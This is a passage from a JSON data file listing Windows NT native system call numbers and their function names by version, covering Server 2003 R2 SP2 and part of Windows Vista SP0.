"NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "R2 SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}}, "Windows Vista": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtClearAllSavepointsTransaction", "138": "NtClearSavepointTransaction", "139": "NtCommitComplete", "140": "NtCommitEnlistment", "141": "NtCommitTransaction", "142": "NtCompactKeys", "143": "NtCompareTokens", "144": "NtCompleteConnectPort", "145": "NtCompressKey", "146": "NtConnectPort", "147": "NtCreateDebugObject", "148": "NtCreateDirectoryObject", "149": "NtCreateEnlistment", "150": "NtCreateEventPair", "151": "NtCreateIoCompletion", "152": "NtCreateJobObject", "153": "NtCreateJobSet", "154": "NtCreateKeyTransacted", "155": "NtCreateKeyedEvent", "156": "NtCreateMailslotFile", "157": "NtCreateMutant", "158": "NtCreateNamedPipeFile", "159": "NtCreatePagingFile", "160": "NtCreatePort", "161": "NtCreatePrivateNamespace", "162": "NtCreateProcess", "163": "NtCreateProfile", "164": "NtCreateResourceManager", "165": "NtCreateSemaphore", "166": "NtCreateSymbolicLinkObject", "167": "NtCreateThreadEx", "168": "NtCreateTimer", "169": "NtCreateToken", "170": "NtCreateTransaction", "171": "NtCreateTransactionManager", "172": "NtCreateUserProcess", "173": "NtCreateWaitablePort", "174": "NtCreateWorkerFactory", "175": "NtDebugActiveProcess", "176": "NtDebugContinue", "177": "NtDeleteAtom", "178": "NtDeleteBootEntry", "179": "NtDeleteDriverEntry", "180": "NtDeleteFile", "181": "NtDeleteKey", "182": "NtDeleteObjectAuditAlarm", "183": "NtDeletePrivateNamespace", "184": "NtDeleteValueKey", "185": "NtDisplayString", "186": "NtEnumerateBootEntries", "187": "NtEnumerateDriverEntries", "188": "NtEnumerateSystemEnvironmentValuesEx", "189": "NtEnumerateTransactionObject", "190": "NtExtendSection", "191": "NtFilterToken", "192": "NtFlushInstallUILanguage", "193": "NtFlushInstructionCache", "194": "NtFlushKey", "195": "NtFlushProcessWriteBuffers", "196": "NtFlushVirtualMemory", "197": "NtFlushWriteBuffer", "198": "NtFreeUserPhysicalPages", "199": "NtFreezeRegistry", "200": "NtFreezeTransactions", "201": "NtGetContextThread", "202": "NtGetCurrentProcessorNumber", "203": "NtGetDevicePowerState", "204": "NtGetMUIRegistryInfo", "205": "NtGetNextProcess", "206": "NtGetNextThread", "207": "NtGetNlsSectionPtr", "208": "NtGetNotificationResourceManager", "209": "NtGetPlugPlayEvent", "210": "NtGetWriteWatch", "211": "NtImpersonateAnonymousToken", "212": "NtImpersonateThread", "213": "NtInitializeNlsFiles", "214": "NtInitializeRegistry", "215": "NtInitiatePowerAction", "216": "NtIsSystemResumeAutomatic", "217": "NtIsUILanguageComitted", "218": "NtListTransactions", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtMarshallTransaction", "233": "NtModifyBootEntry", "234": "NtModifyDriverEntry", "235": "NtNotifyChangeDirectoryFile", "236": "NtNotifyChangeKey", "237": "NtNotifyChangeMultipleKeys", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyTransacted", "243": "NtOpenKeyedEvent", "244": "NtOpenMutant", "245": "NtOpenObjectAuditAlarm", "246": "NtOpenPrivateNamespace", "247": "NtOpenProcessToken", "248": "NtOpenResourceManager", "249": "NtOpenSemaphore", "250": "NtOpenSession", "251": "NtOpenSymbolicLinkObject", "252": "NtOpenThread", "253": "NtOpenTimer", "254": "NtOpenTransaction", "255": "NtOpenTransactionManager", "256": "NtPlugPlayControl", "257": "NtPrePrepareComplete", "258": "NtPrePrepareEnlistment", "259": "NtPrepareComplete", "260": "NtPrepareEnlistment", "261": "NtPrivilegeCheck", "262": "NtPrivilegeObjectAuditAlarm", "263": "NtPrivilegedServiceAuditAlarm", "264": "NtPropagationComplete", "265": "NtPropagationFailed", "266": "NtPullTransaction", "267": "NtPulseEvent", "268": "NtQueryBootEntryOrder", "269": "NtQueryBootOptions", "270": "NtQueryDebugFilterState", "271": "NtQueryDirectoryObject", "272": "NtQueryDriverEntryOrder", "273": "NtQueryEaFile", "274": "NtQueryFullAttributesFile", "275": "NtQueryInformationAtom", "276": "NtQueryInformationEnlistment", "277": "NtQueryInformationJobObject", "278": "NtQueryInformationPort", "279": "NtQueryInformationResourceManager", "280": "NtQueryInformationTransaction", "281": "NtQueryInformationTransactionManager", "282": "NtQueryInformationWorkerFactory", "283": "NtQueryInstallUILanguage", "284": "NtQueryIntervalProfile", "285": "NtQueryIoCompletion", "286": "NtQueryLicenseValue", "287": "NtQueryMultipleValueKey", "288": "NtQueryMutant", "289": "NtQueryOpenSubKeys", "290": "NtQueryOpenSubKeysEx", "291": "NtQueryPortInformationProcess", "292": "NtQueryQuotaInformationFile", "293": "NtQuerySecurityObject", "294": "NtQuerySemaphore", "295": "NtQuerySymbolicLinkObject", "296": "NtQuerySystemEnvironmentValue", "297": "NtQuerySystemEnvironmentValueEx", "298": "NtQueryTimerResolution", "299": "NtRaiseException", "300": "NtRaiseHardError", "301": "NtReadOnlyEnlistment", "302": "NtRecoverEnlistment", "303": "NtRecoverResourceManager", "304": "NtRecoverTransactionManager", "305": "NtRegisterProtocolAddressInformation", "306": "NtRegisterThreadTerminatePort", "307": "NtReleaseCMFViewOwnership", "308": "NtReleaseKeyedEvent", "309": "NtReleaseWorkerFactoryWorker", "310": "NtRemoveIoCompletionEx", "311": "NtRemoveProcessDebug", "312": "NtRenameKey", "313": "NtReplaceKey", "314": "NtReplyWaitReplyPort", "315": "NtRequestDeviceWakeup", "316": "NtRequestPort", "317": "NtRequestWakeupLatency", "318": "NtResetEvent", "319": "NtResetWriteWatch", "320": "NtRestoreKey", "321": "NtResumeProcess", "322": "NtRollbackComplete", "323": "NtRollbackEnlistment", "324": "NtRollbackSavepointTransaction", "325": "NtRollbackTransaction", "326": "NtRollforwardTransactionManager", "327": "NtSaveKey", "328": "NtSaveKeyEx", "329": "NtSaveMergedKeys", "330": "NtSavepointComplete", "331": "NtSavepointTransaction", "332": "NtSecureConnectPort", "333": "NtSetBootEntryOrder", "334": "NtSetBootOptions", "335": "NtSetContextThread", "336": "NtSetDebugFilterState", "337": "NtSetDefaultHardErrorPort", "338": "NtSetDefaultLocale", "339": "NtSetDefaultUILanguage", "340": "NtSetDriverEntryOrder", "341": "NtSetEaFile", "342": "NtSetHighEventPair", "343": "NtSetHighWaitLowEventPair", "344": "NtSetInformationDebugObject", "345": "NtSetInformationEnlistment", "346": "NtSetInformationJobObject", "347": "NtSetInformationKey", "348": "NtSetInformationResourceManager", "349": "NtSetInformationToken", "350": "NtSetInformationTransaction", "351": "NtSetInformationTransactionManager", "352": "NtSetInformationWorkerFactory", "353": "NtSetIntervalProfile", "354": "NtSetIoCompletion", "355": "NtSetLdtEntries", "356": "NtSetLowEventPair", "357": "NtSetLowWaitHighEventPair", "358": "NtSetQuotaInformationFile", "359": "NtSetSecurityObject", "360": "NtSetSystemEnvironmentValue", "361": "NtSetSystemEnvironmentValueEx", "362": "NtSetSystemInformation", "363": "NtSetSystemPowerState", "364": 